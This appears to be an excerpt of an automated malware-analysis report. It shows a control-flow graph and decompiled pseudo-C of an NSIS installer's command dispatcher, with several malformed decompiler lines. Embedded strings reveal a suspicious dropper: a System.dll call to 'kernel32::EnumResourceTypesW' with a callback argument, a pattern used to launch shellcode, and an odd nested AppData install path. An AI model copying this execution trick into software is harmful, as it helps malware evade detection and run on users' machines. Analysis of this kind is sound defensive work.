                                                                                                                                                                                            control_flow_graph 393 40154a-4015a6 394 402cfc 393->394 395 4015ac 393->395 415 402d00 394->415 396 4018a3-4018ac call 402e92 call 406851 395->396 397 401624-40162a 395->397 398 4016a6-4016b3 395->398 399 401669-40168f 395->399 400 4015cb-4015d3 395->400 401 40180c-401829 call 402e92 GetFullPathNameA 395->401 402 4017b0-4017d3 call 402e92 * 3 MoveFileA 395->402 403 4015f1-4015f2 395->403 404 4015b3-4015b5 395->404 405 4016d3-4016df call 402e92 SetFileAttributesA 395->405 406 401694-4016a1 call 406408 395->406 407 4016f5-401708 call 402e92 call 4069b5 395->407 408 401875-401892 call 402e92 SearchPathA 395->408 409 4018b6-4018d8 call 402e92 call 406b9e 395->409 410 401618-40161f SetForegroundWindow 395->410 411 4015ba-4015bb 395->411 412 4015fd-401613 call 402e56 Sleep 395->412 413 4015de-4015ec call 402f0c call 401399 395->413 414 40179f-4017ab call 402e92 call 4063bd 395->414 473 4018b1 396->473 435 401656-401664 397->435 436 40162c 397->436 420 4016b5-4016b9 ShowWindow 398->420 421 4016bd-4016c4 398->421 418 402d08-402d12 399->418 424 4015c1-4015c6 400->424 425 4015d5-4015dc PostQuitMessage 400->425 453 401836-40183c 401->453 454 40182b-401834 401->454 497 4017e1-4017e5 402->497 498 4017d5-4017dc 402->498 432 4015f3-4015f8 call 405ba4 403->432 404->418 455 4016e5-4016e7 405->455 406->394 479 401762-40176b 407->479 480 40170a-40171e call 4063e4 407->480 408->394 458 401898-40189e 408->458 482 4018e2-4018f4 call 40690a call 406346 lstrcatA 409->482 483 4018da-4018e0 call 40690a 409->483 410->394 422 4015bc call 405ba4 411->422 412->394 413->418 478 401e5a-401e5c 414->478 417 402d06 415->417 417->418 420->421 421->394 439 4016ca-4016ce ShowWindow 421->439 422->424 424->418 425->424 432->394 435->394 451 40163c-401651 call 402e56 436->451 452 40162e-401635 436->452 439->394 451->394 452->451 466 401859 453->466 467 40183e-401840 453->467 465 40185d-401861 454->465 455->394 468 4016ed-4016f0 455->468 458->415 465->415 477 401867-401870 GetShortPathNameA 465->477 466->465 467->466 476 401842-40184a call 4063bd 467->476 468->415 473->455 476->454 502 40184c-401854 call 40690a 476->502 477->394 486 401e62-401e66 478->486 487 401b7c-401b80 478->487 484 401798-40179a 479->484 485 40176d-40178c call 405ba4 call 40690a SetCurrentDirectoryA 479->485 503 401720-401724 480->503 504 401737-401738 call 405ccc 480->504 506 4018f9-401901 call 406aed 482->506 483->506 484->432 485->415 520 401792-401793 485->520 486->418 487->418 487->478 497->468 505 4017eb-4017f3 call 4063bd 497->505 498->432 502->466 503->504 511 401726-40172d call 4062ec 503->511 518 40173d-40173f 504->518 505->468 522 4017f9-401807 call 4060e5 505->522 519 401902-401905 506->519 511->504 529 40172f-401730 call 405cec 511->529 523 401741-401746 518->523 524 401757-401760 518->524 527 401934-401936 519->527 528 401907-401911 call 4063bd 519->528 520->415 522->432 525 401753 523->525 526 401748-401751 GetFileAttributesA 523->526 524->479 524->480 525->524 526->524 526->525 532 401938-401939 call 40698d 527->532 533 40193e-401959 call 40671a 527->533 540 401913-401922 CompareFileTime 528->540 541 401924-401933 528->541 539 401735 529->539 532->533 543 4019e6-401a17 call 405ba4 call 4030d6 533->543 544 40195f-401961 533->544 539->518 540->541 541->527 556 401a20-401a28 SetFileTime 543->556 557 401a19-401a1e 543->557 546 401963-4019af call 40690a * 2 call 405d47 call 40690a call 406898 544->546 547 4019cd-4019e1 call 405ba4 544->547 546->519 575 4019b5-4019b8 546->575 547->415 559 401a2e-401a3b CloseHandle 556->559 557->556 557->559 559->394 561 401a41-401a44 559->561 563 401a46-401a55 call 405d47 lstrcatA 561->563 564 401a57-401a5a call 405d47 561->564 570 401a5f-401a6a call 406898 563->570 564->570 570->424 576 4019c2-4019c8 575->576 577 4019ba-4019bd 575->577 576->417 577->422
                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                            			E0040154A() {
				signed int _t415;
				intOrPtr _t416;
				signed int _t420;
				intOrPtr _t423;
				intOrPtr _t431;
				void* _t435;
				void* _t436;

				_t423 =  *0x4237f8; // 0x303de
				_t420 = 7;
				 *((intOrPtr*)(_t435 + 0x14)) = _t423;
				memcpy(_t435 + 0x24,  *(_t435 + 0x1d0), _t420 << 2);
				_t436 = _t435 + 0xc;
				_t431 =  *((intOrPtr*)(_t436 + 0x28));
				 *((intOrPtr*)(_t436 + 0x10)) = 0;
				 *((intOrPtr*)(_t436 + 0x54)) =  *((intOrPtr*)(_t436 + 0x2c));
				 *0x40a0e4 = _t436 + 0x28;
				_t415 =  *((intOrPtr*)(_t436 + 0x24)) + 0xfffffffe;
				if(_t415 > 0x41) {
					L377:
					_t416 =  *((intOrPtr*)(_t436 + 0x10));
					L378:
					 *0x4240c8 =  *0x4240c8 + _t416;
					L379:
					return 0;
				}
				switch( *((intOrPtr*)(_t415 * 4 +  &M00402D16))) {
					case 0:
						return _t431;
					case 1:
						_push(0);
						_push(__esi);
						goto L4;
					case 2:
						 *0x4237ec =  *0x4237ec + 1;
						__eflags = __edx;
						if(__edx != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						E00402F0C(__esi) = __eax - 1;
						_push(0);
						return __eax;
					case 4:
						_push(0);
						goto L10;
					case 5:
						__eax = E00402E56(0);
						0 = 1;
						__eflags = __eax - 1;
						__ecx =  >  ? __eax : 1;
						Sleep( >  ? __eax : 1); // executed
						goto L377;
					case 6:
						__eax = SetForegroundWindow(__edx);
						goto L377;
					case 7:
						__eax =  *0x4237e4;
						__edi = ShowWindow;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx);
							__esi =  *(__esp + 0x28);
						}
						__eax =  *0x4237e8; // 0x203d0
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __esi);
						}
						goto L377;
					case 8:
						__eax = E00402E92(__edx, 0xfffffff0);
						__eax = SetFileAttributesA(__eax,  *(__esp + 0x2c)); // executed
						goto L28;
					case 9:
						__edi = E00402E92(__edx, 0xfffffff0);
						__esi = E004069B5(__edi);
						__eflags = __esi;
						if(__esi == 0) {
							L41:
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							__eflags =  *(__esp + 0x30) - __ebx;
							if( *(__esp + 0x30) == __ebx) {
								_push(0xfffffff5);
								goto L11;
							} else {
								_push(0xffffffe6);
								E00405BA4() = E0040690A("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly", __edi);
								__eax = SetCurrentDirectoryA(__edi); // executed
								__eflags = __eax;
								__eax =  *(__esp + 0x10);
								if(__eflags == 0) {
									__eax =  &(__eax[1]);
								}
								goto L378;
							}
						} else {
							goto L31;
						}
						do {
							L31:
							__esi = E004063E4(__esi, 0x5c);
							__al =  *__esi;
							 *(__esp + 0x14) = __al;
							 *__esi = __bl;
							__eflags = __al;
							if(__al != 0) {
								L35:
								__eax = E00405CCC(__edi);
								L36:
								__eflags = __eax;
								if(__eax == 0) {
									goto L40;
								}
								__eflags = __eax - 0xb7;
								if(__eax != 0xb7) {
									L39:
									_t41 = __esp + 0x10;
									 *_t41 =  *(__esp + 0x10) + 1;
									__eflags =  *_t41;
									goto L40;
								}
								__eax = GetFileAttributesA(__edi); // executed
								__eflags = __al & 0x00000010;
								if((__al & 0x00000010) != 0) {
									goto L40;
								}
								goto L39;
							}
							__eflags =  *(__esp + 0x30) - __ebx;
							if( *(__esp + 0x30) == __ebx) {
								goto L35;
							}
							__eax = E004062EC();
							__eflags = __eax;
							if(__eax == 0) {
								goto L35;
							} else {
								__eax = E00405CEC(__edi); // executed
								goto L36;
							}
							L40:
							__al =  *(__esp + 0x14);
							 *__esi = __al;
							__esi = __esi + 1;
							__eflags = __al;
						} while (__al != 0);
						goto L41;
					case 0xa:
						__eax = E00402E92(__edx, 0);
						__eax = E004063BD(__eax);
						goto L176;
					case 0xb:
						__eax =  *(__esp + 0x30);
						__eflags =  *(__esp + 0x30);
						if(__eflags > 0) {
							__eax =  *(0x424080 + __esi * 4);
							 *(0x4240c0 + __esi * 4) =  *(0x424080 + __esi * 4);
						} else {
							if(__eflags == 0) {
								__eax =  *(0x4240c0 + __esi * 4);
								 *(0x424080 + __esi * 4) =  *(0x4240c0 + __esi * 4);
							}
							0 = E00402E56("true");
							__eax =  *(__esp + 0x28);
							 *(0x4240c0 +  *(__esp + 0x28) * 4) = __ecx;
						}
						goto L377;
					case 0xc:
						__ecx =  *(__esp + 0x30);
						_push(4);
						__edx =  *(0x4240c0 + __ecx * 4);
						__edx = __edx &  *(__esp + 0x38);
						 *(0x4240c0 + __ecx * 4) = __edx &  *(__esp + 0x38);
						__eax = 0;
						__eflags = __edx;
						_pop(__ecx);
						 ==  ? 0 : 0 =  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
						return  *((intOrPtr*)(__esp + ( ==  ? 0 : 0) + 0x28));
					case 0xd:
						_push( *(0x4240c0 + __ecx * 4));
						goto L21;
					case 0xe:
						__esi = E00402E92(__edx, 0xffffffd0);
						__edi = E00402E92(__edx, 0xffffffdf);
						__eax = E00402E92(__edx, 0x13);
						__eax = MoveFileA(__esi, __edi); // executed
						__eflags = __eax;
						if(__eax == 0) {
							__eflags =  *(__esp + 0x30);
							if( *(__esp + 0x30) == 0) {
								goto L29;
							}
							__eax = E004063BD(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L29;
							} else {
								__eax = E004060E5(__esi, __edi);
								_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
								_push(0xffffffe4);
								goto L11;
							}
						} else {
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							_push(0xffffffe3);
							goto L11;
						}
					case 0xf:
						__esi = E00402E92(__edx, 0);
						__ebp = 0x400;
						__eax = __esp + 0x18;
						__eax = GetFullPathNameA(__esi, 0x400, __edi, __esp + 0x18);
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *(__esp + 0x18);
							__eflags = __eax - __esi;
							if(__eax <= __esi) {
								L57:
								__eax =  *(__esp + 0x10);
								L58:
								__eflags =  *(__esp + 0x30) - __ebx;
								if( *(__esp + 0x30) != __ebx) {
									goto L378;
								} else {
									__eax = GetShortPathNameA(__edi, __edi, __ebp);
									goto L377;
								}
							}
							__eflags =  *__eax - __bl;
							if( *__eax == __bl) {
								goto L57;
							}
							__eax = E004063BD(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L52;
							} else {
								__eflags = __eax;
								__eax = E0040690A( *(__esp + 0x1c), __eax);
								goto L57;
							}
						}
						L52:
						__eax = 0;
						 *__edi = __bl;
						__eax = 1;
						 *(__esp + 0x10) = 1;
						goto L58;
					case 0x10:
						__eax = E00402E92(__edx, 0xffffffff);
						__ecx = __esp + 0x54;
						__eax = SearchPathA(0, __eax, 0, 0x400, __ebp, __esp + 0x54);
						__eflags = __eax;
						if(__eax != 0) {
							goto L377;
						}
						goto L61;
					case 0x11:
						__eax = E00402E92(__edx, 0xffffffef);
						__eax = E00406851(__ebp, __eax); // executed
						goto L28;
					case 0x12:
						__eax = E00402E92(__edx, 0x31);
						__ebp =  *(__esp + 0x28);
						__esi = __eax;
						 *(__esp + 0x1c) = __esi;
						__ebp =  *(__esp + 0x28) & 0x00000007;
						__eax = E00406B9E(__esi);
						__edi = 0x40a0e8;
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040690A(0x40a0e8, "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly");
							0 = lstrcatA(0, ??);
						} else {
							_push(0x40a0e8);
							__eax = E0040690A();
						}
						__eax = E00406AED(__edi);
						__esi = 0;
						__esi = 1;
						__eflags = 1;
						do {
							__eflags = __ebp - 3;
							if(__ebp < 3) {
								L72:
								__eflags = __ebp;
								if(__ebp == 0) {
									__eax = E0040698D(__edi);
								}
								__eax = 0;
								__eflags = __ebp - __esi;
								0 | __eflags != 0x00000000 = 1 + (__eflags != 0);
								__eax = E0040671A(__edi, 0x40000000, 1 + (__eflags != 0));
								 *(__esp + 0x1c) = __eax;
								__eflags = __eax - 0xffffffff;
								if(__eax != 0xffffffff) {
									__esi =  *(__esp + 0x18);
									_push(__esi);
									_push(0xffffffea);
									__eax = E00405BA4();
									__ebp =  *(__esp + 0x1c);
									 *0x4240f4 =  *0x4240f4 + 1;
									__eax = E004030D6(__ecx,  *(__esp + 0x3c), __ebp, __ebx, __ebx); // executed
									 *0x4240f4 =  *0x4240f4 - 1;
									__eflags =  *(__esp + 0x34) - 0xffffffff;
									 *(__esp + 0x1c) = __eax;
									if( *(__esp + 0x34) != 0xffffffff) {
										L84:
										__esp + 0x34 = SetFileTime(__ebp, __esp + 0x34, __ebx, __esp + 0x34); // executed
										L85:
										__eax = CloseHandle(__ebp); // executed
										__eax =  *(__esp + 0x1c);
										__eflags = __eax;
										if(__eax >= 0) {
											goto L377;
										}
										__eflags = __eax - 0xfffffffe;
										if(__eax != 0xfffffffe) {
											_push(0xffffffee);
											_push(__edi);
											__eax = E00405D47();
										} else {
											_push(0xffffffe9);
											_push(__edi);
											E00405D47() = lstrcatA(__edi, __esi);
										}
										_push(0x200010);
										_push(__edi);
										goto L90;
									}
									__eflags =  *(__esp + 0x38) - 0xffffffff;
									if( *(__esp + 0x38) == 0xffffffff) {
										goto L85;
									}
									goto L84;
								} else {
									__eflags = __ebp;
									if(__ebp != 0) {
										__esi =  *(__esp + 0x18);
										_push( *(__esp + 0x18));
										_push(0xffffffe2);
										__eax = E00405BA4();
										__eax = 0;
										__eflags = __ebp - 2;
										goto L81;
									}
									goto L76;
								}
							}
							__eax = E004063BD(__edi);
							__ecx = __ebx;
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __esp + 0x34;
								__eax =  &(__eax[0x14]);
								__eflags = __eax;
							}
							__ebp =  &(__ebp[0xfffffffffffffffd]);
							__ebp = __ebp | 0x80000000;
							__ebp = __ebp & __ecx;
							__ebp =  ~__ebp;
							asm("sbb ebp, ebp");
							__ebp =  &(__ebp[1]);
							__eflags = __ebp;
							goto L72;
							L76:
							E0040690A("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp", "kernel32::EnumResourceTypesW(i 0,i r1,i 0)") = E0040690A("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", __edi);
							_push( *(__esp + 0x3c));
							_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
							E00405D47() = E0040690A("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", "C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp");
							 *(__esp + 0x28) =  *(__esp + 0x28) >> 3;
							__eax = E00406898("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll",  *(__esp + 0x28) >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
						} while (__eax == 0);
						__eax = __eax - 1;
						__eflags = __eax;
						if(__eax == 0) {
							 *0x4240c8 =  *0x4240c8 + 1;
							goto L379;
						}
						_push(__edi);
						_push(0xfffffffa);
						L4:
						__eax = E00405BA4();
						goto L5;
					case 0x13:
						_push(0);
						goto L92;
					case 0x14:
						__eax = E00402E92(__edx, 0x31);
						__eax = E00406898(__eax,  *(__esp + 0x28));
						__eflags = __eax;
						if(__eax == 0) {
							goto L29;
						}
						__eflags = __eax -  *(__esp + 0x30);
						if(__eax ==  *(__esp + 0x30)) {
							goto L123;
						}
						__eflags = __eax -  *(__esp + 0x38);
						if(__eax !=  *(__esp + 0x38)) {
							goto L377;
						}
						__eax =  *(__esp + 0x3c);
						return  *(__esp + 0x3c);
					case 0x15:
						_push(0xfffffff0);
						L92:
						__eax = E00402E92(__edx);
						_push( *(__esp + 0x2c));
						_push(__eax);
						__eax = E004064FD(__eflags);
						goto L377;
					case 0x16:
						__eax = E00402E92(__edx, "true");
						__eax = lstrlenA(__eax);
						goto L99;
					case 0x17:
						__edi = E00402E56(2);
						__esi = __edx;
						 *(__esp + 0x20) = E00402E56(3);
						__eax = E00402E92(__edx, "true");
						 *(__esp + 0x1c) = __eax;
						__eax = lstrlenA(__eax);
						__eflags = __esi;
						 *__ebp = __bl;
						__ecx = __eax;
						__edi =  ==  ? __ecx : __edi;
						__eflags = __edi;
						if(__edi == 0) {
							goto L377;
						}
						__eax =  *(__esp + 0x1c);
						__eflags = __eax;
						if(__eax >= 0) {
							L103:
							__eflags = __eax - __ecx;
							__eax = E0040690A(__ebp, __eax);
							__eflags = __edi;
							if(__edi < 0) {
								__edi = __edi + lstrlenA(__ebp);
								__eflags = __edi;
							}
							__eax = 0;
							__eflags = __edi;
							__eax =  >=  ? __edi : 0;
							__eflags = __eax - 0x400;
							if(__eax < 0x400) {
								__eax[__ebp] = __bl;
							}
							goto L377;
						}
						__eax =  &(__eax[__ecx]);
						__eflags = __eax;
						if(__eax < 0) {
							goto L377;
						}
						goto L103;
					case 0x18:
						__esi = E00402E92(__edx, 0x20);
						_push(E00402E92(__edx, 0x31));
						_push(__esi);
						__eflags =  *(__esp + 0x40);
						if( *(__esp + 0x40) != 0) {
							__eax = lstrcmpA();
						} else {
							__eax = lstrcmpiA();
						}
						__eflags = __eax;
						if(__eax != 0) {
							goto L123;
						} else {
							goto L111;
						}
					case 0x19:
						__esi = 0;
						__esi = 1;
						__edi = E00402E92(__edx, 1);
						__eax = ExpandEnvironmentStringsA(__edi, __ebp, 0x400);
						__eflags = __eax;
						if(__eax == 0) {
							L115:
							__eax = __esi;
							 *__ebp = __bl;
							L117:
							__ebp[0x3ff] = __bl;
							goto L378;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) == 0) {
							L116:
							__eax =  *(__esp + 0x10);
							goto L117;
						}
						__eax = lstrcmpA(__edi, __ebp);
						__eflags = __eax;
						if(__eax != 0) {
							goto L116;
						}
						goto L115;
					case 0x1a:
						__esi =  *(__esp + 0x3c);
						__edi = E00402E56(0);
						__eax = E00402E56("true");
						__eflags = __esi;
						if(__esi != 0) {
							__eflags = __edi - __eax;
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									goto L111;
								}
								L125:
								__eax =  *(__esp + 0x38);
								return  *(__esp + 0x38);
							}
							L123:
							__eax =  *(__esp + 0x34);
							return  *(__esp + 0x34);
						}
						__eflags = __edi - __eax;
						if(__eflags < 0) {
							goto L123;
						}
						if(__eflags <= 0) {
							goto L111;
						}
						goto L125;
					case 0x1b:
						__edi = 0;
						__edi = 1;
						__esi = E00402E56(1);
						0 = E00402E56(2);
						__eax =  *(__esp + 0x34);
						__eflags = __eax - 0xd;
						if(__eax > 0xd) {
							L149:
							_push(__esi);
							goto L21;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00402E1E))) {
							case 0:
								__esi = __esi + __ecx;
								goto L149;
							case 1:
								__esi = __esi - __ecx;
								goto L149;
							case 2:
								__esi = __esi * __ecx;
								goto L149;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L133;
								}
								__eax = __esi;
								asm("cdq");
								_t95 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t95;
								__esi = __eax;
								goto L134;
							case 4:
								__esi = __esi | __ecx;
								goto L149;
							case 5:
								__esi = __esi & __ecx;
								goto L149;
							case 6:
								__esi = __esi ^ __ecx;
								goto L149;
							case 7:
								__eax = 0;
								__eflags = __esi;
								__eax = 0 | __eflags == 0x00000000;
								__esi = __eflags == 0;
								goto L149;
							case 8:
								__eflags = __esi;
								if(__esi != 0) {
									goto L141;
								}
								goto L140;
							case 9:
								__eflags = __esi;
								if(__esi != 0) {
									L140:
									__eflags = __ecx;
									if(__ecx == 0) {
										goto L143;
									}
									L141:
									__esi = __edi;
									goto L149;
								}
								L143:
								__esi = __ebx;
								goto L149;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L133:
									__esi = __ebx;
									L134:
									__eax = 0;
									__eflags = __ecx;
									__eax = 0 | __eflags == 0x00000000;
									 *(__esp + 0x10) = __eflags == 0;
									goto L149;
								}
								__eax = __esi;
								asm("cdq");
								_t104 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t104;
								__esi = _t104;
								goto L134;
							case 0xb:
								__esi = __esi << __cl;
								goto L149;
							case 0xc:
								__esi = __esi >> __cl;
								goto L149;
							case 0xd:
								__esi = __esi >> __cl;
								__eflags = __esi;
								goto L149;
						}
					case 0x1c:
						__esi = E00402E92(__edx, "true");
						E00402E56(2) = wsprintfA(__ebp, __esi, __eax);
						__esp = __esp + 0x10;
						goto L377;
					case 0x1d:
						__eax =  *(__esp + 0x30);
						__esi =  *0x40a0e0; // 0x0
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = GlobalAlloc(0x40, 0x404);
								_push( *(__esp + 0x28));
								__esi = __eax;
								_t110 = __esi + 4; // 0x4
								__eax = _t110;
								_push(_t110);
								__eax = E00405D47();
								__eax =  *0x40a0e0; // 0x0
								 *__esi = __eax;
								 *0x40a0e0 = __esi;
								goto L377;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L29;
							}
							_t108 = __esi + 4; // 0x4
							_t108 = E0040690A(__ebp, _t108);
							__eax =  *__esi;
							 *0x40a0e0 =  *__esi;
							__eax = GlobalFree(__esi);
							goto L161;
						} else {
							goto L152;
						}
						while(1) {
							L152:
							__eax = __eax - 1;
							__eflags = __esi;
							if(__esi == 0) {
								goto L157;
							}
							__esi =  *__esi;
							__eflags = __eax;
							if(__eax != 0) {
								continue;
							}
							__eflags = __esi;
							if(__esi == 0) {
								goto L157;
							}
							__esi = __esi + 4;
							__edi = 0x40a0e8;
							__eax = E0040690A(0x40a0e8, __esi);
							__eax =  *0x40a0e0; // 0x0
							__eax = E0040690A(__esi, __eax);
							__eax =  *0x40a0e0; // 0x0
							_push(0x40a0e8);
							__eax =  &(__eax[4]);
							__eflags = __eax;
							_push(__eax);
							goto L156;
						}
						goto L157;
					case 0x1e:
						__esi = E00402E56(3);
						 *(__esp + 0x20) = __esi;
						__edi = E00402E56(4);
						__eax =  *(__esp + 0x44);
						__eflags = __al & 0x00000001;
						if((__al & 0x00000001) != 0) {
							__esi = E00402E92(__edx, 0x33);
							__eax =  *(__esp + 0x3c);
							 *(__esp + 0x18) = __esi;
						}
						__eflags = __al & 0x00000002;
						if((__al & 0x00000002) != 0) {
							__edi = E00402E92(__edx, 0x44);
						}
						__eflags =  *(__esp + 0x24) - 0x21;
						_push("true");
						if(__eflags != 0) {
							__esi = E00402E92(__edx);
							__eax = E00402E92(__edx);
							__ecx = 0;
							__eflags =  *__eax - __cl;
							 !=  ? __eax : 0 = 0;
							__eflags =  *__esi - __cl;
							__ecx =  !=  ? __esi : 0;
							__eax = FindWindowExA( *(__esp + 0x24), __edi,  !=  ? __esi : 0,  !=  ? __eax : 0);
							goto L172;
						} else {
							 *(__esp + 0x20) = E00402E56();
							__eax = E00402E56(2);
							__ecx =  *(__esp + 0x3c);
							__ecx =  *(__esp + 0x3c) >> 2;
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = SendMessageA( *(__esp + 0x24), __eax, __esi, __edi);
								L172:
								__ecx = __eax;
								__eax =  *(__esp + 0x10);
								 *(__esp + 0x14) = __ecx;
								L173:
								__eflags =  *(__esp + 0x28) - __ebx;
								if( *(__esp + 0x28) < __ebx) {
									goto L378;
								}
								_push(__ecx);
								goto L21;
							}
							__edx = __esp + 0x14;
							__eax = SendMessageTimeoutA( *(__esp + 0x30), __eax, __esi, __edi, __ebx, __ecx, __esp + 0x14);
							__ecx =  *(__esp + 0x14);
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esp + 0x10) = __eax;
							goto L173;
						}
					case 0x1f:
						__eax = E00402E56(0);
						__eax = IsWindow(__eax);
						L176:
						__eflags = __eax;
						if(__eax == 0) {
							L111:
							__eax =  *(__esp + 0x30);
							return  *(__esp + 0x30);
						}
						__eax =  *(__esp + 0x2c);
						return  *(__esp + 0x2c);
					case 0x20:
						__esi = E00402E56(2);
						__eax = E00402E56("true");
						__eax = GetDlgItem(__eax, __esi);
						goto L99;
					case 0x21:
						__esi =  *0x424048;
						__esi =  *0x424048 + __ecx;
						E00402E56(0) = SetWindowLongA(__eax, 0xffffffeb, __esi);
						goto L377;
					case 0x22:
						__eflags =  *(__esp + 0x34) & 0x00000100;
						if(( *(__esp + 0x34) & 0x00000100) == 0) {
							__eax = GetDlgItem(__edx,  *(__esp + 0x30));
						} else {
							__eax = E00402E56(2);
						}
						__ebx = __eax;
						__eax =  *(__esp + 0x34);
						__ecx = __eax;
						__edi = __eax;
						__ecx = __eax & 0x00000004;
						__edi = __eax >> 0x1e;
						 *(__esp + 0x14) = __eax & 0x00000004;
						__esi = __eax;
						__ecx = __eax;
						__esi = __eax & 0x00000003;
						__ecx = __eax >> 0x1f;
						__edi = __eax >> 0x0000001e & 0x00000001;
						 *(__esp + 0x1c) = __eax >> 0x1f;
						__eflags = __eax & 0x00010000;
						if((__eax & 0x00010000) == 0) {
							__eax =  *(__esp + 0x2c) & 0x0000ffff;
						} else {
							__eax = E00402E92(__edx, 0x11);
						}
						 *(__esp + 0x18) = __eax;
						__esp + 0x54 = GetClientRect(__ebx, __esp + 0x54);
						 *(__esp + 0x34) =  *(__esp + 0x34) & 0x0000fef0;
						 *(__esp + 0x64) =  *(__esp + 0x64) * __edi;
						 *(__esp + 0x64) =  *(__esp + 0x64) *  *(__esp + 0x24);
						__eax = 0;
						__eflags =  *(__esp + 0x20);
						__eax =  !=  ?  *0x4237f4 : 0;
						__edi = LoadImageA( !=  ?  *0x4237f4 : 0,  *(__esp + 0x28), __esi,  *(__esp + 0x64) *  *(__esp + 0x24),  *(__esp + 0x64) * __edi,  *(__esp + 0x34) & 0x0000fef0);
						__eax = SendMessageA(__ebx, 0x172, __esi, __edi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __esi;
							if(__esi == 0) {
								__eax = DeleteObject(__eax);
							}
						}
						__eflags =  *(__esp + 0x28);
						if( *(__esp + 0x28) < 0) {
							goto L377;
						} else {
							_push(__edi);
							goto L21;
						}
					case 0x23:
						__edi = GetDC(__edx);
						__esi = E00402E56(2);
						__eax = GetDeviceCaps(__edi, 0x5a);
						__eax = MulDiv(__esi, __eax, 0x48);
						0x40b4e8->lfHeight = __eax;
						 *(__esp + 0x14) = ReleaseDC( *(__esp + 0x14), __edi);
						__eax = E00402E56(3);
						__ecx =  *(__esp + 0x38);
						_push( *(__esp + 0x2c));
						 *0x40b4f8 = __eax;
						__cl = __cl & 0x00000001;
						 *0x40b4ff = 1;
						 *0x40b4fc = __cl & 0x00000001;
						__al = __cl;
						__al = __cl & 0x00000002;
						__cl = __cl & 0x00000004;
						_push("Tahoma");
						 *0x40b4fd = __al;
						 *0x40b4fe = __cl;
						__eax = E00405D47();
						__eax = CreateFontIndirectA(0x40b4e8); // executed
						goto L99;
					case 0x24:
						__esi = E00402E56(0);
						_push(E00402E56("true"));
						_push(__esi);
						__eflags =  *(__esp + 0x3c);
						if( *(__esp + 0x3c) != 0) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow(); // executed
						}
						goto L377;
					case 0x25:
						__ebx = E00402E92(__edx, 0);
						__esi = E00402E92(__edx, 0x31);
						__edi = E00402E92(__edx, 0x22);
						__eax = E00402E92(__edx, 0x15);
						_push("C:\Users\Arthur\AppData\Local\Temp\nsm8742.tmp\System.dll");
						_push(0xffffffec);
						__eax = E00405BA4();
						__ecx =  *(__esp + 0x38);
						__eax =  *(__esp + 0x14);
						 *(__esp + 0x5c) =  *(__esp + 0x14);
						__eax = 0;
						 *(__esp + 0x58) =  *(__esp + 0x38);
						__ecx =  *(__esp + 0x34);
						 *(__esp + 0x70) = __ecx;
						__eflags =  *__ebx - __al;
						 *(__esp + 0x64) = __esi;
						__eax =  !=  ? __ebx : 0;
						 *(__esp + 0x60) =  !=  ? __ebx : 0;
						__eax = 0;
						__eflags =  *__edi - __al;
						 *(__esp + 0x6c) = "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly";
						__eax =  !=  ? __edi : 0;
						 *(__esp + 0x68) =  !=  ? __edi : 0;
						__eax = __esp + 0x54;
						__eax = E004067EE(__esp + 0x54);
						__eflags = __eax;
						if(__eax == 0) {
							goto L29;
						}
						__eflags =  *(__esp + 0x58) & 0x00000040;
						if(( *(__esp + 0x58) & 0x00000040) == 0) {
							goto L377;
						}
						__eax = E00406304(__ecx,  *(__esp + 0x8c));
						__eax = CloseHandle( *(__esp + 0x8c));
						goto L198;
					case 0x26:
						__eax = E00402E92(__edx, 0);
						__esi = __eax;
						_push(__eax);
						_push(0xffffffeb);
						__eax = E00405BA4();
						__esi = E004064BA(__esi);
						__eflags = __esi;
						if(__esi == 0) {
							goto L29;
						}
						__eflags =  *(__esp + 0x30);
						if( *(__esp + 0x30) != 0) {
							__ecx = E00406304(__ecx, __esi);
							__eflags =  *(__esp + 0x2c);
							if( *(__esp + 0x2c) < 0) {
								__eax =  *(__esp + 0x10);
								0 = 1;
								__eflags = __ecx;
								__eax =  !=  ? 1 :  *(__esp + 0x10);
								 *(__esp + 0x10) =  !=  ? 1 :  *(__esp + 0x10);
							} else {
								__eax = E00406408(__edi, __ecx);
							}
						}
						__eax = CloseHandle(__esi);
						goto L198;
					case 0x27:
						__eax = E00402E92(__edx, 2);
						__esi = __eax;
						__eflags = __esi;
						if(__esi == 0) {
							 *__ebp = __bl;
							 *__edi = __bl;
							goto L29;
						}
